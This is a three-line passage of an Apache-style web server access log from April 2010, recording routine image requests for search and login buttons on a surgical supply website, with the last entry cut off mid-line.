64.221.88.162 - - [07/Apr/2010:08:20:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:20:24 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:20:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 -